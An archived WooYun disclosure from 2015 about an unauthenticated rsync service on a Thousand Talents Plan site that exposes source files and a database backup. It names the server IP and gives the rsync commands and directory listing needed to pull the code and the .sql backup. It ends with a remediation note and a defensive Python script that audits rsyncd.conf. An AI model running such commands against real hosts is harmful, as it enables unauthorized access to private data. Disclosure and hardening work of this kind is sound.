WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles, online reader ---------------- http://drop.zone.ci/
2015-03-02: Actively contacting the vendor and waiting for the vendor to acknowledge the report; details not disclosed publicly.
2015-04-16: The vendor has actively ignored the vulnerability; details disclosed to the public.
Unauthorized access on a Thousand Talents Plan (千人计划) site leaks source files and database backup files
The server IP is 211.151.58.236. rsync is reachable without authentication (readable, not writable); the database is configured for the internal network and cannot be accessed remotely.
Unauthenticated access:
rsync 211.151.58.236::
1000plan                        1000plan source code
test                            test
backup-1000plan                 backup db && backup file
var-www-qrjh_zhb                backup source
var-www-qrjh_zhb_data_upload    backup data_upload
Website source files:
rsync 211.151.58.236::1000plan
drwxrwxr-x        4096 2015/01/16 19:14:27 .
-rw-r--r--        5000 2014/11/05 16:14:43 .htaccess
-rwxr-xr-x        4998 2014/11/04 18:17:28 .htaccess.2014-11
-rwxr-xr-x        4893 2014/11/04 18:09:42 .htaccess.bak
-rwxrwxr-x       43360 2013/09/24 18:27:03 CHANGELOG.txt
-rwxrwxr-x         988 2013/09/24 18:27:03 COPYRIGHT.txt
-rwxrwxr-x        1924 2013/09/24 18:27:03 MAINTAINERS.txt
-rwxrwxr-x        5002 2013/09/24 18:27:03 UPGRADE.txt
-rwxrwxr-x        5810 2013/09/24 18:27:03 awstat.php
-rwxrwxr-x         262 2013/09/24 18:27:03 cron.php
-rwxrwxr-x        1406 2013/09/24 18:27:03 favicon.ico
-rwxrwxr-x        2358 2013/09/24 18:27:03 index.htm
-rwxrwxr-x        2637 2014/03/17 09:32:20 index.php
-rwxrwxr-x        2665 2014/03/15 16:30:42 index.php.bak
-rwxrwxr-x        7710 2013/09/24 18:27:03 login.htm
-rwxrwxr-x        1490 2014/09/05 17:12:56 niu.html
-rwxrwxr-x        1590 2013/09/24 18:27:03 robots.txt
-rwxrwxr-x         266 2013/09/24 18:27:03 sitemap.xml
-rwxrwxr-x         125 2013/09/24 18:27:03 temp.xml
-rwxrwxr-x          30 2014/06/12 18:49:13 test.txt
-rwxrwxr-x       25457 2013/09/24 18:27:03 update.php
-rwxrwxr-x          32 2013/09/24 18:27:03 webscan_360_cn.html
-rwxrwxr-x         352 2013/09/24 18:27:03 xmlrpc.php
drwxrwxr-x        4096 2015/01/16 19:18:00 .svn
drwxrwxr-x        4096 2013/09/24 18:27:03 Storage
drwxrwxr-x        4096 2015/02/28 17:41:27 chuangye
drwxrwxr-x        4096 2014/10/17 15:38:22 include
drwxrwxr-x        4096 2013/09/24 18:26:32 includes
drwxrwxr-x        4096 2013/09/24 18:26:23 jiancai
drwxrwxr-x        4096 2015/01/16 18:28:21 js
drwxrwxr-x        4096 2013/09/24 18:26:20 lianyihuisite
drwxrwxr-x        4096 2013/09/24 18:26:59 misc
drwxrwxr-x        4096 2013/09/24 18:26:35 modules
drwxrwxr-x        4096 2013/12/18 20:21:55 ocs
drwxrwxr-x        4096 2013/09/24 18:26:21 profiles
drwxrwxr-x        4096 2014/09/04 18:29:49 pushmail
drwxrwxr-x        4096 2013/09/24 18:26:22 scripts
drwxrwxr-x        4096 2013/09/24 18:26:32 site
drwxrwxr-x        4096 2013/09/24 18:26:39 sites
drwxrwxr-x        4096 2013/09/24 18:26:21 themes
drwxrwxr-x        4096 2014/12/25 11:28:11 tools
drwxrwxr-x        4096 2013/08/22 12:14:28 trunk
drwxrwxrwx        4096 2015/02/28 08:55:57 wiki
drwxr-xr-x        4096 2015/01/16 19:14:50 wiki_bak
drwxrwxr-x        4096 2013/09/24 18:26:59 wiki_syn
drwxr-xr-x        4096 2014/11/10 14:05:21 ycfw
drwxrwxr-x        4096 2013/09/24 18:26:32 zhaopin_test
drwxr-xr-x        4096 2014/12/29 11:36:27 zj
Database backup file:
rsync 211.151.58.236::backup-1000plan/qrjh_14120111.sql.back
As above.
Add access controls to the rsync modules.
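The fix above amounts to restricting who can reach each rsyncd module. As an added example (not part of the original report), the script below audits an rsyncd.conf for modules exported without a host restriction or authentication; the two configurations are constructed samples that reuse the module names from the listing above, the first being the kind of open export described here and the second a hardened version using the standard rsyncd.conf directives.

```python
"""Audit rsyncd.conf modules for missing access controls (added example)."""
import configparser

# Constructed sample: modules exported like the ones in the report, with no
# host restriction and no authentication, so any client can list and read them.
WEAK_CONF = """
[1000plan]
path = /var/www/1000plan
comment = 1000plan source code

[backup-1000plan]
path = /backup
comment = backup db && backup file
"""

# Constructed hardened version: read-only, hidden from module listing,
# limited to an internal range, and requiring a user from the secrets file.
HARDENED_CONF = """
[backup-1000plan]
path = /backup
comment = backup db && backup file
read only = yes
list = no
hosts allow = 10.0.0.0/8
hosts deny = *
auth users = backupuser
secrets file = /etc/rsyncd.secrets
"""

# Directives that must be present for a module not to be openly exported.
REQUIRED = ("hosts allow", "auth users", "secrets file")


def audit(conf_text):
    """Return {module: [missing directives]} for every module that lacks a
    host restriction or authentication. rsyncd.conf uses INI-style
    `[module]` sections with `key = value` lines, so configparser reads it;
    global settings before the first section are not checked here."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(conf_text)
    findings = {}
    for module in cp.sections():
        missing = [d for d in REQUIRED if not cp.get(module, d, fallback="").strip()]
        if missing:
            findings[module] = missing
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(text) or "OK")
```

rsync refuses to use a secrets file that other users can read while `strict modes` is on (the default), so the file named in `secrets file` should be owned by the daemon user and mode 600.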
Unable to contact the vendor, or the vendor actively refused.